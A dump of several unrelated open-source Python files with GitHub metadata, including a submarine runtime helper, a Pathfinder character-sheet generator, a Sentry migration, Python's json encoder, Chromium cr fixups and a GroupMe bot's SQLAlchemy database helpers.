"name": "Python",
"bytes": "6568"
},
{
"name": "Shell",
"bytes": "1783"
}
],
"symlink_target": ""
}
|
import collections, subprocess, shlex, shm, gevent, imp
procstat = collections.namedtuple('procstat', ['code', 'stdout', 'stderr'])
def proc_running(process):
return shell('pgrep -f {}'.format(process)).code == 0
def shell(command):
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc.wait()
return procstat(proc.returncode, proc.stdout.read(), proc.stderr.read())
def delayed(time, func):
gevent.sleep(time)
return func()
def is_changing(func, length = 100):
val = func()
updated = False
iters = 0
while iters < length:
if func() != val:
updated = True
break
gevent.sleep(0.01)
iters += 1
return updated
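# Usage sketch (hypothetical sensor object): with the defaults this polls the
# value every ~10 ms for up to `length` iterations (about a second) and
# reports whether it ever changed.
#   alive = is_changing(lambda: sensor.read())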
|
{
"content_hash": "2596d698783705117e61375622379da8",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 96,
"avg_line_length": 23.53125,
"alnum_prop": 0.6308100929614874,
"repo_name": "cuauv/software",
"id": "92b4f02aaa03123fd107fef20b609cf825ce5287",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "system_check/runtime.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "271780"
},
{
"name": "C++",
"bytes": "2831785"
},
{
"name": "CMake",
"bytes": "5365"
},
{
"name": "CSS",
"bytes": "5082"
},
{
"name": "Dockerfile",
"bytes": "2758"
},
{
"name": "Emacs Lisp",
"bytes": "19028"
},
{
"name": "GLSL",
"bytes": "6783"
},
{
"name": "HTML",
"bytes": "3642"
},
{
"name": "Haskell",
"bytes": "4770"
},
{
"name": "JavaScript",
"bytes": "113413"
},
{
"name": "Makefile",
"bytes": "12887"
},
{
"name": "Nix",
"bytes": "16335"
},
{
"name": "OCaml",
"bytes": "3804"
},
{
"name": "PureBasic",
"bytes": "58"
},
{
"name": "Python",
"bytes": "2141765"
},
{
"name": "Scheme",
"bytes": "129544"
},
{
"name": "Shell",
"bytes": "68820"
},
{
"name": "TeX",
"bytes": "25243"
},
{
"name": "Vim script",
"bytes": "125505"
}
],
"symlink_target": ""
}
|
'''This module contains a script for generating Pathfinder character
sheets in LaTeX'''
import argparse
import fileinput
import os
import shutil
from string import Template
from core.pf_character import PFCharacter
__all__ = []
# --- Constants ---
TEMPLATE_FILES = [
'/main.tex',
'/character.tex',
'/res/latex/class/class1.tex',
'/res/latex/stats/defense.tex',
'/res/latex/stats/offense.tex',
]
def generate_character(dest_path, char_path="default.json"):
'''Generates a LaTeX project for a Pathfinder character sheet
:param dest_path: destination directory for character sheet
:param char_path: path to JSON file with Pathfinder character data
'''
character = PFCharacter(char_path)
# update the destination path string to reflect imported character vals
dest_path = "%s/%s" % (dest_path, character.name)
shutil.copytree('template/Character Sheet', dest_path)
set_char_vals(dest_path, character.get_template_values())
def parse_cmd_args():
'''Parses command line arguments
:returns: map data structure containing each argument and its associated value
'''
# create parser for command line arguments
help_desc = 'Generates LaTeX character sheets for the Pathfinder RPG'
parser = argparse.ArgumentParser(description=help_desc)
# -argument- sets destination directory for output
parser.add_argument('dest', help='destination directory for output')
# -argument [optional]- import character from a JSON file
parser.add_argument('--import', metavar='PATH',
help='imports character data from JSON file')
# parse command line arguments
args = vars(parser.parse_args())
return args
def set_char_vals(char_path, char_vals):
'''Replaces placeholder values in character sheet template with those that
describe a particular character
:param char_path: directory containing the character sheet
:param char_vals: dictionary structured according to string.Template
'''
# replace placeholder values in character sheet template
for x in TEMPLATE_FILES:
# read file data
template_file = open(char_path + x, 'r')
template_data = template_file.read()
template_file.close()
# apply values to template
replace_text = Template(template_data).substitute(char_vals)
# write data to file
template_file = open(char_path + x, 'w')
template_file.write(replace_text)
template_file.close()
# rename the character.tex to reflect the change in character name
os.rename('%s/character.tex' % char_path,
'%s/%s.tex' % (char_path, char_vals['name']))
# rename the class1.tex files to reflect the character's class
new_path_tuple = (char_path, char_vals['class1'])
os.rename('%s/res/latex/class/class1.tex' % char_path,
'%s/res/latex/class/%s.tex' % new_path_tuple)
os.rename('%s/res/latex/class-features/display/class1.tex' % char_path,
'%s/res/latex/class-features/display/%s.tex' % new_path_tuple)
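# Illustrative substitution (hypothetical values): a template file containing
# "Name: ${name} the ${class1}" rendered with
# {'name': 'Valeros', 'class1': 'Fighter'} yields "Name: Valeros the Fighter".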
# --- Script ---
if __name__ == '__main__':
# parse command line arguments
args = parse_cmd_args()
# generate character
if args['import'] is not None:
generate_character(args['dest'], args['import'])
else:
generate_character(args['dest'])
|
{
"content_hash": "902b4c89a9bfa28dbf6660331ea19d4c",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 78,
"avg_line_length": 32.371428571428574,
"alnum_prop": 0.6654898499558694,
"repo_name": "lot9s/pathfinder-rpg-utils",
"id": "98a15d46f582f8baa56b2f4b9b9a5c4791aaf039",
"size": "3399",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "character-sheets/creator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "47955"
},
{
"name": "TeX",
"bytes": "22739"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
# This flag is used to mark that a migration shouldn't be automatically run in
# production. We set this to True for operations that we think are risky and want
# someone from ops to run manually and monitor.
# General advice is that if in doubt, mark your migration as `is_dangerous`.
# Some things you should always mark as dangerous:
# - Large data migrations. Typically we want these to be run manually by ops so that
# they can be monitored. Since data migrations will now hold a transaction open
# this is even more important.
# - Adding columns to highly active tables, even ones that are NULL.
is_dangerous = False
# This flag is used to decide whether to run this migration in a transaction or not.
# By default we prefer to run in a transaction, but for migrations where you want
# to `CREATE INDEX CONCURRENTLY` this needs to be set to False. Typically you'll
# want to create an index concurrently when adding one to an existing table.
atomic = True
dependencies = [
('sentry', '0051_fix_auditlog_pickled_data'),
]
operations = [
migrations.AddField(
model_name='organizationonboardingtask',
name='completion_seen',
field=models.DateTimeField(null=True),
),
]
|
{
"content_hash": "fa694b327e9e1a612d8821cdd16c7f9f",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 88,
"avg_line_length": 41.114285714285714,
"alnum_prop": 0.6942321056289089,
"repo_name": "beeftornado/sentry",
"id": "efdf871209ebf7ce25c5ef97d0e5b409f756b007",
"size": "1513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/sentry/migrations/0052_organizationonboardingtask_completion_seen.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "157195"
},
{
"name": "HTML",
"bytes": "197026"
},
{
"name": "JavaScript",
"bytes": "380379"
},
{
"name": "Makefile",
"bytes": "2832"
},
{
"name": "Python",
"bytes": "6473603"
}
],
"symlink_target": ""
}
|
import pytest
@pytest.fixture
def resources(plan_runner):
_, resources = plan_runner()
return resources
def test_resource_count(resources):
"Test number of resources created."
assert len(resources) == 2
def test_iam(resources):
"Test IAM binding resources."
bindings = [r['values'] for r in resources if r['type']
== 'google_storage_bucket_iam_binding']
assert len(bindings) == 1
assert bindings[0]['role'] == 'roles/storage.admin'
|
{
"content_hash": "43901c8216dd5386a29c30d9a38efef4",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 57,
"avg_line_length": 23.4,
"alnum_prop": 0.6816239316239316,
"repo_name": "GoogleCloudPlatform/cloud-foundation-fabric",
"id": "abaf45781f1ea55d77e601df8e2e8633528720a4",
"size": "1044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/modules/container_registry/test_plan.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "6486"
},
{
"name": "Go",
"bytes": "16234"
},
{
"name": "HCL",
"bytes": "1945131"
},
{
"name": "JavaScript",
"bytes": "9392"
},
{
"name": "PowerShell",
"bytes": "16024"
},
{
"name": "Python",
"bytes": "479385"
},
{
"name": "Shell",
"bytes": "17367"
},
{
"name": "Smarty",
"bytes": "7294"
}
],
"symlink_target": ""
}
|
"""Implementation of JSONEncoder
"""
import re
try:
from _json import encode_basestring_ascii as c_encode_basestring_ascii
except ImportError:
c_encode_basestring_ascii = None
try:
from _json import encode_basestring as c_encode_basestring
except ImportError:
c_encode_basestring = None
try:
from _json import make_encoder as c_make_encoder
except ImportError:
c_make_encoder = None
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(b'[\x80-\xff]')
ESCAPE_DCT = {
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i))
#ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
INFINITY = float('inf')
FLOAT_REPR = repr
def py_encode_basestring(s):
"""Return a JSON representation of a Python string
"""
def replace(match):
return ESCAPE_DCT[match.group(0)]
return '"' + ESCAPE.sub(replace, s) + '"'
encode_basestring = (c_encode_basestring or py_encode_basestring)
def py_encode_basestring_ascii(s):
"""Return an ASCII-only JSON representation of a Python string
"""
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
return '\\u{0:04x}'.format(n)
#return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u{0:04x}\\u{1:04x}'.format(s1, s2)
return '"' + ESCAPE_ASCII.sub(replace, s) + '"'
encode_basestring_ascii = (
c_encode_basestring_ascii or py_encode_basestring_ascii)
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str | string |
+-------------------+---------------+
| int, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
    To extend this to recognize other objects, subclass and implement a
    ``.default()`` method that returns a serializable object for ``o`` if
    possible; otherwise it should call the superclass implementation
    (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, default=None):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is true, the output is guaranteed to be str
objects with all incoming non-ASCII characters escaped. If
ensure_ascii is false, the output can contain non-ASCII characters.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation.
If specified, separators should be an (item_separator, key_separator)
tuple. The default is (', ', ': ') if *indent* is ``None`` and
(',', ': ') otherwise. To get the most compact JSON representation,
you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
elif indent is not None:
self.item_separator = ','
if default is not None:
self.default = default
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
raise TypeError(repr(o) + " is not JSON serializable")
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> from json.encoder import JSONEncoder
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, str):
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return ''.join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
if (_one_shot and c_make_encoder is not None
and self.indent is None):
_iterencode = c_make_encoder(
markers, self.default, _encoder, self.indent,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, self.allow_nan)
else:
_iterencode = _make_iterencode(
markers, self.default, _encoder, self.indent, floatstr,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, _one_shot)
return _iterencode(o, 0)
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
str=str,
tuple=tuple,
):
if _indent is not None and not isinstance(_indent, str):
_indent = ' ' * _indent
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + _indent * _current_indent_level
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, str):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, int):
# Subclasses of int/float may override __str__, but we still
# want to encode them as integers/floats in JSON. One example
# within the standard library is IntEnum.
yield buf + str(int(value))
elif isinstance(value, float):
# see comment above for int
yield buf + _floatstr(float(value))
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + _indent * _current_indent_level
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.items()
for key, value in items:
if isinstance(key, str):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
# see comment for int/float in _make_iterencode
key = _floatstr(float(key))
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, int):
# see comment for int/float in _make_iterencode
key = str(int(key))
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, str):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, int):
# see comment for int/float in _make_iterencode
yield str(int(value))
elif isinstance(value, float):
# see comment for int/float in _make_iterencode
yield _floatstr(float(value))
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, str):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, int):
# see comment for int/float in _make_iterencode
yield str(int(o))
elif isinstance(o, float):
# see comment for int/float in _make_iterencode
yield _floatstr(float(o))
elif isinstance(o, (list, tuple)):
yield from _iterencode_list(o, _current_indent_level)
elif isinstance(o, dict):
yield from _iterencode_dict(o, _current_indent_level)
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
yield from _iterencode(o, _current_indent_level)
if markers is not None:
del markers[markerid]
return _iterencode
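# --- Hedged usage sketch (editor's addition, not part of the module) ---
if __name__ == '__main__':
    # Compact output: separators=(',', ':') drops all inter-token whitespace,
    # as described in the JSONEncoder constructor docstring.
    compact = JSONEncoder(separators=(',', ':')).encode({'a': [1, 2], 'b': True})
    assert compact == '{"a":[1,2],"b":true}'

    # Extending via default(): return a serializable stand-in, or defer to
    # the base class so unknown types still raise TypeError.
    class SetEncoder(JSONEncoder):
        def default(self, o):
            if isinstance(o, set):
                return sorted(o)  # encode sets as sorted lists
            return JSONEncoder.default(self, o)

    assert SetEncoder().encode({'s': {3, 1, 2}}) == '{"s": [1, 2, 3]}'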
|
{
"content_hash": "a8a648c4796897808916061e8a85e69d",
"timestamp": "",
"source": "github",
"line_count": 440,
"max_line_length": 78,
"avg_line_length": 37.31363636363636,
"alnum_prop": 0.5159580947740285,
"repo_name": "Suwmlee/XX-Net",
"id": "a071cc677a6f2f59e4919cc1cec472a6e8f2c86a",
"size": "16418",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3",
"path": "Python3/lib/json/encoder.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "200"
},
{
"name": "C",
"bytes": "33097"
},
{
"name": "CSS",
"bytes": "86345"
},
{
"name": "HTML",
"bytes": "141382"
},
{
"name": "JavaScript",
"bytes": "345991"
},
{
"name": "PHP",
"bytes": "10671"
},
{
"name": "Python",
"bytes": "17312939"
},
{
"name": "Shell",
"bytes": "4647"
},
{
"name": "Visual Basic",
"bytes": "382"
}
],
"symlink_target": ""
}
|
"""
WSGI config for buildservice project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
import dotenv
dotenv.read_dotenv(os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "buildservice.settings")
application = get_wsgi_application() # pylint: disable=invalid-name
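# Hedged usage note (editor's addition): a WSGI server imports the
# module-level ``application`` callable exposed above, e.g. (illustrative):
#   gunicorn buildservice.wsgi:application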
|
{
"content_hash": "1da586e123c9ac55e922d102a2902c80",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 84,
"avg_line_length": 29.555555555555557,
"alnum_prop": 0.7631578947368421,
"repo_name": "m-vdb/github-buildservice-boilerplate",
"id": "1abe720589cc58deef36286bdc6162680566c8cd",
"size": "532",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "buildservice/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1471"
},
{
"name": "Makefile",
"bytes": "312"
},
{
"name": "Python",
"bytes": "22923"
},
{
"name": "Shell",
"bytes": "137"
},
{
"name": "Smarty",
"bytes": "206"
}
],
"symlink_target": ""
}
|
"""A module for architecture output directory fixups."""
from __future__ import print_function
import cr
class _ArchInitHookHelper(cr.InitHook):
"""Base class helper for CR_ARCH value fixups."""
def _VersionTest(self, old_version):
_ = old_version
return True
def _ArchConvert(self, old_arch):
return old_arch
def Run(self, old_version, config):
if old_version is None or not self._VersionTest(old_version):
return
old_arch = config.OVERRIDES.Find(cr.Arch.SELECTOR)
new_arch = self._ArchConvert(old_arch)
if new_arch != old_arch:
print('** Fixing architecture from {0} to {1}'.format(old_arch, new_arch))
config.OVERRIDES[cr.Arch.SELECTOR] = new_arch
class WrongArchDefaultInitHook(_ArchInitHookHelper):
"""Fixes bad initial defaults.
  In the initial versions of cr, before output directories were versioned,
  it wrote invalid architecture defaults. This hook detects that case and
  sets the architecture to the current default instead.
"""
def _VersionTest(self, old_version):
return old_version <= 0.0
def _ArchConvert(self, _):
return cr.Arch.default.name
class MipsAndArmRenameInitHook(_ArchInitHookHelper):
"""Fixes rename of Mips and Arm to Mips32 and Arm32."""
def _ArchConvert(self, old_arch):
if old_arch == 'mips':
return cr.Mips32Arch.GetInstance().name
if old_arch == 'arm':
return cr.Arm32Arch.GetInstance().name
return old_arch
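# --- Hedged sketch (editor's addition, not part of cr) ---
# Shows how the two template methods combine: a hypothetical rename that only
# applies to configs older than a version cutoff. All names are illustrative.
class ExampleRenameInitHookSketch(_ArchInitHookHelper):
  """Illustrative fixup: renames a hypothetical 'x86' arch to 'x64'."""

  def _VersionTest(self, old_version):
    return old_version < 2.0

  def _ArchConvert(self, old_arch):
    if old_arch == 'x86':
      return 'x64'
    return old_arch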
|
{
"content_hash": "5e0e679874c8717462454baa0a069d42",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 80,
"avg_line_length": 28.568627450980394,
"alnum_prop": 0.7021276595744681,
"repo_name": "chromium/chromium",
"id": "837a1f9dc6c79b22784b24bb5fb94661e8bb7b6f",
"size": "1598",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "tools/cr/cr/fixups/arch.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""
Model for Projects
Copyright (C) 2020 Anders Lowinger, anders@abundo.se
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
"""
from orderedattrdict import AttrDict
class Project(AttrDict):
_primary_key = "_id"
def __init__(self):
super().__init__()
self.activityid = -1
self.name = ""
self.active = 1
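# Hedged usage sketch (editor's addition): AttrDict exposes each key as an
# attribute, so the same field can be read either way.
if __name__ == "__main__":
    p = Project()
    p.name = "Garden"             # attribute write...
    assert p["name"] == "Garden"  # ...is also a dict entry
    assert p.activityid == -1 and p.active == 1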
|
{
"content_hash": "aaaefa49914bc35cf674ae7421aa26ca",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 70,
"avg_line_length": 28.84375,
"alnum_prop": 0.7193932827735645,
"repo_name": "lowinger42/ergotime",
"id": "c79dd350fbe963ce6762552fe1d3e0d4e06ad8ed",
"size": "946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "common/project.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "434"
},
{
"name": "HTML",
"bytes": "11748"
},
{
"name": "JavaScript",
"bytes": "497"
},
{
"name": "Python",
"bytes": "212922"
},
{
"name": "Shell",
"bytes": "146"
}
],
"symlink_target": ""
}
|
import os
import psycopg2
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from os.path import join, dirname
database_url = os.environ.get("DATABASE_URL")
engine = create_engine(database_url)
Base = declarative_base(engine)
meta = MetaData(bind=engine)
# All my db table connections
last_msg = Table('last_msg', meta, autoload=True, autoload_with=engine, schema='bot')
people = Table('people', meta, autoload=True, autoload_with=engine, schema='bot')
groups = Table('groups', meta, autoload=True, autoload_with=engine, schema='bot')
# Store the most recent msg of every group in last_msg
def store_last_msg(groupId, msgId, msgText, name, senderId):
conn = engine.connect()
print("Storing last msg")
s = select([last_msg]).where(last_msg.c.group_id == groupId)
result = conn.execute(s)
row = result.fetchall()
if not row:
print("Insert msg")
ins = last_msg.insert().values(group_id = groupId, msg_id = msgId, msg_txt = msgText,\
sender_name = name, sender_id = senderId)
result = conn.execute(ins)
else:
print("Update msg")
upd = last_msg.update().where(last_msg.c.group_id == groupId).\
values(group_id = groupId, msg_id = msgId, msg_txt = msgText, sender_name = name, sender_id = senderId)
result = conn.execute(upd)
result.close()
conn.close()
print("Done storing msg")
# Retrieve the last message from a group
def find_last_msg(groupId):
    conn = engine.connect()
    print("Finding last msg")
    s = select([last_msg.c.msg_txt, last_msg.c.sender_name, last_msg.c.sender_id]).where(last_msg.c.group_id == groupId)
    result = conn.execute(s)
    try:
        row = result.fetchone()
        if not row:
            print("No group by that name")
            return None
        print("Found message")
        return row
    finally:
        # The original placed this cleanup after the returns, where it could
        # never run; a finally block guarantees the connection is released.
        result.close()
        conn.close()
        print("Done finding last message")
# Add a person to the people table
def add_person(userId, name):
conn = engine.connect()
print("Adding person")
s = select([people]).where(people.c.user_id == userId)
result = conn.execute(s)
row = result.fetchall()
if not row:
print("Insert person")
ins = people.insert().values(user_id = userId, current_name = name)
result = conn.execute(ins)
else:
print("Update person")
upd = people.update().where(people.c.user_id == userId).values(user_id = userId, current_name = name)
result = conn.execute(upd)
result.close()
conn.close()
print("Done adding person")
# Add a group to the groups table
def add_group(groupId, botId):
conn = engine.connect()
print("Adding group")
s = select([groups]).where(groups.c.group_id == groupId)
result = conn.execute(s)
row = result.fetchall()
if not row:
print("Insert group")
ins = groups.insert().values(group_id = groupId, bot_id = botId)
result = conn.execute(ins)
else:
print("Update group")
upd = groups.update().where(groups.c.group_id == groupId).values(bot_id = botId)
result = conn.execute(upd)
result.close()
conn.close()
print("Done adding group")
# Find the bot id based on nickname
def find_bot_nname(nname):
    conn = engine.connect()
    print("Finding bot id from nickname")
    s = select([groups.c.bot_id]).where(groups.c.nickname == nname)
    result = conn.execute(s)
    try:
        row = result.fetchall()
        if not row:
            print("No bot here")
            return None
        print("Found bot")
        return row
    finally:
        # Cleanup was unreachable after the returns; run it on every path.
        result.close()
        conn.close()
        print("Done finding bot id")
# Show all other available bots for ventriloquism
def show_all_dummy():
    conn = engine.connect()
    print("Showing all dummies")
    s = select([groups.c.nickname])
    result = conn.execute(s)
    try:
        row = result.fetchall()
        if not row:
            print("No dummy bots")
            return None
        print("Got all dummies")
        return row
    finally:
        # Cleanup was unreachable after the returns; run it on every path.
        result.close()
        conn.close()
        print("Done showing dummies")
# Get a user's id based on their name from the people table
def get_user_id(user_name):
    conn = engine.connect()
    print("Finding user id")
    s = select([people.c.user_id]).where(people.c.current_name == user_name)
    result = conn.execute(s)
    try:
        row = result.fetchone()
        if not row:
            print("No person currently has that name")
            return None
        print("Found " + user_name + "'s id")
        return row
    finally:
        # Cleanup was unreachable after the returns; run it on every path.
        result.close()
        conn.close()
        print("Done finding user id")
# Check if a bot is currently silenced
def check_silenced(botId):
    conn = engine.connect()
    print("Checking bot silence")
    s = select([groups.c.is_silenced]).where(groups.c.bot_id == botId)
    result = conn.execute(s)
    try:
        row = result.fetchone()
        if not row:
            print("No group with that bot")
            return None
        print("Found bot's group")
        return row
    finally:
        # Cleanup was unreachable after the returns; run it on every path.
        result.close()
        conn.close()
        print("Done checking silence")
# Silence or awaken a particular bot
def silence_awaken_bot(botId, status):
    conn = engine.connect()
    print("Silence/awakening bot")
    s = select([groups.c.is_silenced]).where(groups.c.bot_id == botId)
    result = conn.execute(s)
    try:
        row = result.fetchone()
        if not row:
            print("No group with that bot")
            return None
        print("Bot's group found")
        upd = groups.update().where(groups.c.bot_id == botId).values(is_silenced = status)
        result = conn.execute(upd)
    finally:
        # The original leaked the connection on the early return above; a
        # finally block closes it on every path.
        result.close()
        conn.close()
        print("Done silence/awakening bot")
|
{
"content_hash": "686d21f61401163f50f1b1ee820745b8",
"timestamp": "",
"source": "github",
"line_count": 179,
"max_line_length": 120,
"avg_line_length": 32.42458100558659,
"alnum_prop": 0.6171605789110958,
"repo_name": "Boijangle/GroupMe-Message-Bot",
"id": "ec990661a8dfd9d2442b3cdb854e2c4cbc3b1524",
"size": "5804",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "database.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "26158"
}
],
"symlink_target": ""
}
|